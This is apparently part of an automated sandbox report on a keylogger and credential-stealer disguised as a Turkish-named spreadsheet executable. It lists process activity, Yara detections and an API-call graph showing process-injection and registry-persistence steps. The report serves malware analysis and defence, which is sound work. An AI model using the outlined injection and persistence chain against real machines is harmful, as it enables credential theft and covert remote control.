                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                2024-10-08 10:45:34 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:06:44:55
                                                Start date:08/10/2024
                                                Path:C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
                                                Imagebase:0xc50000
                                                File size:2'394'624 bytes
                                                MD5 hash:1E9DC5041BF503CB63397E6A8F0BAE9A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2062230360.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2043823101.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2043823101.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:2
                                                Start time:06:44:56
                                                Start date:08/10/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                Imagebase:0x710000
                                                File size:42'064 bytes
                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.4490634067.0000000000431000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4490634067.0000000000431000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4490634067.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4496377708.0000000002B89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:false

                                                General

                                                Target ID:3
                                                Start time:06:45:07
                                                Start date:08/10/2024
                                                Path:C:\Users\user\AppData\Roaming\Tojeiuai.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\Tojeiuai.exe"
                                                Imagebase:0xc80000
                                                File size:2'394'624 bytes
                                                MD5 hash:1E9DC5041BF503CB63397E6A8F0BAE9A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2164548814.0000000003796000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2164548814.0000000003391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 34%, ReversingLabs
                                                • Detection: 42%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:4
                                                Start time:06:45:08
                                                Start date:08/10/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                Imagebase:0x620000
                                                File size:42'064 bytes
                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.4490658108.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4496902509.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:false

                                                General

                                                Target ID:6
                                                Start time:06:45:16
                                                Start date:08/10/2024
                                                Path:C:\Users\user\AppData\Roaming\Tojeiuai.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\Tojeiuai.exe"
                                                Imagebase:0x250000
                                                File size:2'394'624 bytes
                                                MD5 hash:1E9DC5041BF503CB63397E6A8F0BAE9A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.2251979049.0000000002799000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2251979049.0000000002AC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:7
                                                Start time:06:45:17
                                                Start date:08/10/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                Imagebase:0xa20000
                                                File size:42'064 bytes
                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.4490630405.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.4495336578.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:12.4%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:14.1%
                                                  Total number of Nodes:313
                                                  Total number of Limit Nodes:21
                                                  execution_graph 60008 5ad71bd 60009 5ad71c7 60008->60009 60013 5b18941 60009->60013 60018 5b18948 60009->60018 60010 5ad71a7 60014 5b18948 60013->60014 60023 5b18988 60014->60023 60028 5b18978 60014->60028 60015 5b18973 60015->60010 60019 5b1895d 60018->60019 60021 5b18988 2 API calls 60019->60021 60022 5b18978 2 API calls 60019->60022 60020 5b18973 60020->60010 60021->60020 60022->60020 60024 5b189b5 60023->60024 60025 5b18a17 60024->60025 60026 5b16660 VirtualProtect 60024->60026 60027 5b16658 VirtualProtect 60024->60027 60025->60015 60026->60024 60027->60024 60029 5b18988 60028->60029 60030 5b18a17 60029->60030 60031 5b16660 VirtualProtect 60029->60031 60032 5b16658 VirtualProtect 60029->60032 60030->60015 60031->60029 60032->60029 60033 5ad791d 60034 5ad7923 60033->60034 60038 5e00760 60034->60038 60047 5e00752 60034->60047 60039 5e00775 60038->60039 60056 5e007a0 60039->60056 60059 5e00b4e 60039->60059 60062 5e00b28 60039->60062 60065 5e00a63 60039->60065 60068 5e00812 60039->60068 60071 5e00790 60039->60071 60048 5e00775 60047->60048 60050 5e007a0 10 API calls 60048->60050 60051 5e00790 10 API calls 60048->60051 60052 5e00812 10 API calls 60048->60052 60053 5e00a63 10 API calls 60048->60053 60054 5e00b28 10 API calls 60048->60054 60055 5e00b4e 10 API calls 60048->60055 60049 5ad7967 60050->60049 60051->60049 60052->60049 60053->60049 60054->60049 60055->60049 60057 5e007ca 60056->60057 60074 5e01ed8 60057->60074 60060 5e007fd 60059->60060 60061 5e01ed8 10 API calls 60060->60061 60061->60060 60063 5e007fd 60062->60063 60064 5e01ed8 10 API calls 60063->60064 60064->60063 60066 5e007fd 60065->60066 60067 5e01ed8 10 API calls 60066->60067 60067->60066 60069 5e007fd 60068->60069 60070 5e01ed8 10 API calls 60069->60070 60070->60069 60072 5e007a0 60071->60072 60073 5e01ed8 10 API calls 60072->60073 60073->60072 60075 5e01efd 60074->60075 60078 5e01fb9 60075->60078 60079 5e01fd1 60078->60079 60083 5e02730 60079->60083 60096 5e02721 60079->60096 60080 5e01f1f 60080->60057 60084 5e02745 60083->60084 60109 5e032b0 60084->60109 60114 5e0302d 60084->60114 60119 5e0378c 60084->60119 60124 5e02f0b 60084->60124 60128 5e02bb7 60084->60128 60134 5e02c76 60084->60134 60139 5e02b26 60084->60139 60144 5e02d25 60084->60144 60148 5e034a4 60084->60148 60153 5e02ef1 60084->60153 60085 5e02767 60085->60080 60097 5e02745 60096->60097 60099 5e032b0 2 API calls 60097->60099 60100 5e02ef1 4 API calls 60097->60100 60101 5e034a4 2 API calls 60097->60101 60102 5e02d25 4 API calls 60097->60102 60103 5e02b26 2 API calls 60097->60103 60104 5e02c76 2 API calls 60097->60104 60105 5e02bb7 4 API calls 60097->60105 60106 5e02f0b 2 API calls 60097->60106 60107 5e0378c 2 API calls 60097->60107 60108 5e0302d 4 API calls 60097->60108 60098 5e02767 60098->60080 60099->60098 60100->60098 60101->60098 60102->60098 60103->60098 60104->60098 60105->60098 60106->60098 60107->60098 60108->60098 60110 5e032c8 60109->60110 60159 5e03c40 60110->60159 60163 5e03c50 60110->60163 60111 5e032e0 60115 5e02d24 60114->60115 60116 5e027f8 60114->60116 60179 5e05360 60115->60179 60184 5e05351 60115->60184 60116->60085 60120 5e03796 60119->60120 60209 5b16380 60120->60209 60213 5b16388 60120->60213 60121 5e027f8 60121->60085 60217 5e05520 60124->60217 60222 5e05530 60124->60222 60125 5e027f8 60125->60085 60129 5e02bc1 60128->60129 60130 5e02efb 60129->60130 60133 5e05351 4 API calls 60129->60133 60227 5e053a0 60129->60227 60232 5e053b0 60129->60232 60133->60129 60135 5e02c8e 60134->60135 60237 5b16170 60135->60237 60241 5b16169 60135->60241 60136 5e02cce 60136->60085 60140 5e037b2 60139->60140 60141 5e027f8 60139->60141 60142 5b16380 NtResumeThread 60140->60142 60143 5b16388 NtResumeThread 60140->60143 60141->60085 60142->60141 60143->60141 60146 5e05360 2 API calls 60144->60146 60147 5e05351 4 API calls 60144->60147 60145 5e027f8 60145->60085 60146->60145 60147->60145 60149 5e034c1 60148->60149 60151 5b16170 WriteProcessMemory 60149->60151 60152 5b16169 WriteProcessMemory 60149->60152 60150 5e027f8 60150->60085 60151->60150 60152->60150 60154 5e02efb 60153->60154 60155 5e02bdd 60153->60155 60155->60153 60156 5e053a0 2 API calls 60155->60156 60157 5e053b0 2 API calls 60155->60157 60158 5e05351 4 API calls 60155->60158 60156->60155 60157->60155 60158->60155 60160 5e03c45 60159->60160 60161 5e03c89 60160->60161 60167 5e03f26 60160->60167 60161->60111 60164 5e03c67 60163->60164 60165 5e03c89 60164->60165 60166 5e03f26 2 API calls 60164->60166 60165->60111 60166->60165 60171 5b156f8 60167->60171 60175 5b156ed 60167->60175 60172 5b156fd CreateProcessA 60171->60172 60174 5b15974 60172->60174 60176 5b156f8 CreateProcessA 60175->60176 60178 5b15974 60176->60178 60180 5e05375 60179->60180 60193 5b15ab0 60180->60193 60197 5b15aa8 60180->60197 60181 5e0538e 60181->60116 60185 5e053a9 60184->60185 60186 5e0535a 60184->60186 60201 5b16008 60185->60201 60205 5b16010 60185->60205 60191 5b15ab0 Wow64SetThreadContext 60186->60191 60192 5b15aa8 Wow64SetThreadContext 60186->60192 60187 5e053e7 60187->60116 60188 5e0538e 60188->60116 60191->60188 60192->60188 60194 5b15af9 Wow64SetThreadContext 60193->60194 60196 5b15b71 60194->60196 60196->60181 60198 5b15ab0 Wow64SetThreadContext 60197->60198 60200 5b15b71 60198->60200 60200->60181 60202 5b16010 VirtualAllocEx 60201->60202 60204 5b160cc 60202->60204 60204->60187 60206 5b16054 VirtualAllocEx 60205->60206 60208 5b160cc 60206->60208 60208->60187 60210 5b16388 NtResumeThread 60209->60210 60212 5b16428 60210->60212 60212->60121 60214 5b163d1 NtResumeThread 60213->60214 60216 5b16428 60214->60216 60216->60121 60218 5e05530 60217->60218 60220 5b15ab0 Wow64SetThreadContext 60218->60220 60221 5b15aa8 Wow64SetThreadContext 60218->60221 60219 5e0555e 60219->60125 60220->60219 60221->60219 60223 5e05545 60222->60223 60225 5b15ab0 Wow64SetThreadContext 60223->60225 60226 5b15aa8 Wow64SetThreadContext 60223->60226 60224 5e0555e 60224->60125 60225->60224 60226->60224 60228 5e053c5 60227->60228 60230 5b16010 VirtualAllocEx 60228->60230 60231 5b16008 VirtualAllocEx 60228->60231 60229 5e053e7 60229->60129 60230->60229 60231->60229 60233 5e053c5 60232->60233 60235 5b16010 VirtualAllocEx 60233->60235 60236 5b16008 VirtualAllocEx 60233->60236 60234 5e053e7 60234->60129 60235->60234 60236->60234 60238 5b161bc WriteProcessMemory 60237->60238 60240 5b16255 60238->60240 60240->60136 60242 5b16170 WriteProcessMemory 60241->60242 60244 5b16255 60242->60244 60244->60136 60245 5b14e50 60246 5b14e9f NtProtectVirtualMemory 60245->60246 60248 5b14f17 60246->60248 60249 5ad78c1 60250 5ad78c7 60249->60250 60254 5aec1e8 60250->60254 60259 5aec1d8 60250->60259 60251 5ad790b 60255 5aec1e9 60254->60255 60264 5aec228 60255->60264 60269 5aec218 60255->60269 60256 5aec213 60256->60251 60260 5aec1dd 60259->60260 60262 5aec228 2 API calls 60260->60262 60263 5aec218 2 API calls 60260->60263 60261 5aec213 60261->60251 60262->60261 60263->60261 60266 5aec242 60264->60266 60265 5aec35d 60265->60256 60266->60265 60267 5b16660 VirtualProtect 60266->60267 60268 5b16658 VirtualProtect 60266->60268 60267->60266 60268->60266 60271 5aec21c 60269->60271 60270 5aec35d 60270->60256 60271->60270 60272 5b16660 VirtualProtect 60271->60272 60273 5b16658 VirtualProtect 60271->60273 60272->60271 60273->60271 60274 5ad7551 60275 5ad7562 60274->60275 60279 5b1c8c0 60275->60279 60297 5b1c8b3 60275->60297 60276 5ad71a7 60280 5b1c8d5 60279->60280 60315 5b1d0db 60280->60315 60320 5b1d8f9 60280->60320 60325 5b1cf59 60280->60325 60330 5b1da16 60280->60330 60335 5b1dfd5 60280->60335 60340 5b1d272 60280->60340 60344 5b1da32 60280->60344 60349 5b1d22a 60280->60349 60353 5b1e02a 60280->60353 60358 5b1cf68 60280->60358 60363 5b1e2c5 60280->60363 60368 5b1dca2 60280->60368 60372 5b1e09f 60280->60372 60377 5b1db3f 60280->60377 60382 5b1d0ba 60280->60382 60281 5b1c8eb 60281->60276 60298 5b1c8c0 60297->60298 60300 5b1da32 2 API calls 60298->60300 60301 5b1d272 2 API calls 60298->60301 60302 5b1dfd5 2 API calls 60298->60302 60303 5b1da16 2 API calls 60298->60303 60304 5b1cf59 2 API calls 60298->60304 60305 5b1d8f9 2 API calls 60298->60305 60306 5b1d0db 2 API calls 60298->60306 60307 5b1d0ba 2 API calls 60298->60307 60308 5b1db3f 2 API calls 60298->60308 60309 5b1e09f 2 API calls 60298->60309 60310 5b1dca2 2 API calls 60298->60310 60311 5b1e2c5 2 API calls 60298->60311 60312 5b1cf68 2 API calls 60298->60312 60313 5b1e02a 2 API calls 60298->60313 60314 5b1d22a 2 API calls 60298->60314 60299 5b1c8eb 60299->60276 60300->60299 60301->60299 60302->60299 60303->60299 60304->60299 60305->60299 60306->60299 60307->60299 60308->60299 60309->60299 60310->60299 60311->60299 60312->60299 60313->60299 60314->60299 60316 5b1cfdf 60315->60316 60317 5b1cfee 60316->60317 60387 5b18190 60316->60387 60391 5b18184 60316->60391 60317->60281 60321 5b1cfdf 60320->60321 60322 5b1cfee 60321->60322 60323 5b18190 RegOpenKeyExA 60321->60323 60324 5b18184 RegOpenKeyExA 60321->60324 60322->60281 60323->60321 60324->60321 60326 5b1cf68 60325->60326 60327 5b1cfee 60326->60327 60328 5b18190 RegOpenKeyExA 60326->60328 60329 5b18184 RegOpenKeyExA 60326->60329 60327->60281 60328->60326 60329->60326 60331 5b1cfdf 60330->60331 60332 5b1cfee 60331->60332 60333 5b18190 RegOpenKeyExA 60331->60333 60334 5b18184 RegOpenKeyExA 60331->60334 60332->60281 60333->60331 60334->60331 60336 5b1cfdf 60335->60336 60337 5b1cfee 60336->60337 60338 5b18190 RegOpenKeyExA 60336->60338 60339 5b18184 RegOpenKeyExA 60336->60339 60337->60281 60338->60336 60339->60336 60341 5b1d271 60340->60341 60341->60340 60342 5b1dcac 60341->60342 60395 5e3fe10 60341->60395 60345 5b1cfdf 60344->60345 60346 5b1cfee 60345->60346 60347 5b18190 RegOpenKeyExA 60345->60347 60348 5b18184 RegOpenKeyExA 60345->60348 60346->60281 60347->60345 60348->60345 60350 5b1d1b8 60349->60350 60350->60349 60351 5b1dcac 60350->60351 60352 5e3fe10 2 API calls 60350->60352 60352->60350 60355 5b1e030 60353->60355 60354 5b1e203 60354->60281 60355->60354 60408 5b183c8 60355->60408 60412 5b183bc 60355->60412 60359 5b1cf92 60358->60359 60360 5b1cfee 60359->60360 60361 5b18190 RegOpenKeyExA 60359->60361 60362 5b18184 RegOpenKeyExA 60359->60362 60360->60281 60361->60359 60362->60359 60365 5b1e2cb 60363->60365 60364 5b1e429 60365->60364 60366 5b183c8 RegSetValueExA 60365->60366 60367 5b183bc RegSetValueExA 60365->60367 60366->60365 60367->60365 60369 5b1dcac 60368->60369 60370 5b1d271 60368->60370 60370->60368 60371 5e3fe10 2 API calls 60370->60371 60371->60370 60373 5b1e0a8 60372->60373 60374 5b1e203 60373->60374 60375 5b183c8 RegSetValueExA 60373->60375 60376 5b183bc RegSetValueExA 60373->60376 60374->60281 60375->60373 60376->60373 60378 5b1cfdf 60377->60378 60379 5b1cfee 60378->60379 60380 5b18190 RegOpenKeyExA 60378->60380 60381 5b18184 RegOpenKeyExA 60378->60381 60379->60281 60380->60378 60381->60378 60384 5b1cfdf 60382->60384 60383 5b1cfee 60383->60281 60384->60383 60385 5b18190 RegOpenKeyExA 60384->60385 60386 5b18184 RegOpenKeyExA 60384->60386 60385->60384 60386->60384 60388 5b181ef RegOpenKeyExA 60387->60388 60390 5b182ca 60388->60390 60393 5b18191 RegOpenKeyExA 60391->60393 60394 5b182ca 60393->60394 60396 5e3fe25 60395->60396 60400 5b17ee8 60396->60400 60404 5b17edc 60396->60404 60401 5b17eed CopyFileA 60400->60401 60403 5b18075 60401->60403 60406 5b17ee8 CopyFileA 60404->60406 60407 5b18075 60406->60407 60409 5b1842d RegSetValueExA 60408->60409 60411 5b1853a 60409->60411 60413 5b183c8 RegSetValueExA 60412->60413 60415 5b1853a 60413->60415

                                                  Executed Functions

                                                  Function 05ADC710 Relevance: 16.2, Strings: 12, Instructions: 1178COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-3443518476
                                                  • Opcode ID: 5bd7ac0cb408ec1a4f7eb287789fc885b1f4a69fe1b3cdf9aa5d878a3acbea86
                                                  • Instruction ID: eb2b31667294de6e9fed030d9bcb6d33fe740d987c6b0fd10b1c65312060d01d
                                                  • Opcode Fuzzy Hash: 5bd7ac0cb408ec1a4f7eb287789fc885b1f4a69fe1b3cdf9aa5d878a3acbea86
                                                  • Instruction Fuzzy Hash: 0BB23974A002189FDB14DFA9C994FADB7B6FF48710F148599E516AB2A4CB70EC81CF60
                                                  Function 05ADCA37 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-324474496
                                                  • Opcode ID: 54ba36d3bba44c9e5ce80811e59d932b1ccb657ead942dc1169e27996c781234
                                                  • Instruction ID: 36601b54c12c82710c8977dd25944388c3f3b7bbc66d9528d71222831cdf12b9
                                                  • Opcode Fuzzy Hash: 54ba36d3bba44c9e5ce80811e59d932b1ccb657ead942dc1169e27996c781234
                                                  • Instruction Fuzzy Hash: 1F22FB74A002149FDB14DF65C994FADB7B2FF48714F1481A9E50AAB2A5DB30ED82CF60
                                                  Function 0311C8F8 Relevance: 6.0, Strings: 4, Instructions: 983COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 701 311c8f8-311c919 702 311c920-311ca07 701->702 703 311c91b 701->703 705 311d109-311d131 702->705 706 311ca0d-311cb4e call 3118b10 702->706 703->702 709 311d837-311d840 705->709 752 311d0d2-311d0fc 706->752 753 311cb54-311cbaf 706->753 710 311d846-311d85d 709->710 711 311d13f-311d149 709->711 714 311d150-311d244 call 3118b10 711->714 715 311d14b 711->715 734 311d246-311d252 714->734 735 311d26e 714->735 715->714 737 311d254-311d25a 734->737 738 311d25c-311d262 734->738 739 311d274-311d294 735->739 740 311d26c 737->740 738->740 744 311d2f4-311d374 739->744 745 311d296-311d2ef 739->745 740->739 766 311d376-311d3c9 744->766 767 311d3cb-311d40e call 3118b10 744->767 756 311d834 745->756 763 311d106 752->763 764 311d0fe 752->764 760 311cbb1 753->760 761 311cbb4-311cbbf 753->761 756->709 760->761 765 311cfe7-311cfed 761->765 763->705 764->763 768 311cff3-311d06f call 3110420 765->768 769 311cbc4-311cbe2 765->769 792 311d419-311d422 766->792 767->792 812 311d0bc-311d0c2 768->812 772 311cbe4-311cbe8 769->772 773 311cc39-311cc4e 769->773 772->773 778 311cbea-311cbf5 772->778 776 311cc50 773->776 777 311cc55-311cc6b 773->777 776->777 781 311cc72-311cc89 777->781 782 311cc6d 777->782 783 311cc2b-311cc31 778->783 788 311cc90-311cca6 781->788 789 311cc8b 781->789 782->781 786 311cc33-311cc34 783->786 787 311cbf7-311cbfb 783->787 791 311ccb7-311cd22 786->791 793 311cc01-311cc19 787->793 794 311cbfd 787->794 795 311cca8 788->795 796 311ccad-311ccb4 788->796 789->788 799 311cd24-311cd30 791->799 800 311cd36-311ceeb 791->800 802 311d482-311d491 792->802 797 311cc20-311cc28 793->797 798 311cc1b 793->798 794->793 795->796 796->791 797->783 798->797 799->800 810 311ceed-311cef1 800->810 811 311cf4f-311cf64 800->811 803 311d493-311d51b 802->803 804 311d424-311d44c 802->804 839 311d694-311d6a0 803->839 807 311d453-311d47c 804->807 808 311d44e 804->808 807->802 808->807 810->811 817 311cef3-311cf02 810->817 815 311cf66 811->815 816 311cf6b-311cf8c 811->816 813 311d071-311d0b9 812->813 814 311d0c4-311d0ca 812->814 813->812 814->752 815->816 819 311cf93-311cfb2 816->819 820 311cf8e 816->820 822 311cf41-311cf47 817->822 826 311cfb4 819->826 827 311cfb9-311cfd9 819->827 820->819 823 311cf04-311cf08 822->823 824 311cf49-311cf4a 822->824 831 311cf12-311cf33 823->831 832 311cf0a-311cf0e 823->832 829 311cfe4 824->829 826->827 833 311cfe0 827->833 834 311cfdb 827->834 829->765 835 311cf35 831->835 836 311cf3a-311cf3e 831->836 832->831 833->829 834->833 835->836 836->822 841 311d520-311d529 839->841 842 311d6a6-311d701 839->842 843 311d532-311d688 841->843 844 311d52b 841->844 857 311d703-311d736 842->857 858 311d738-311d762 842->858 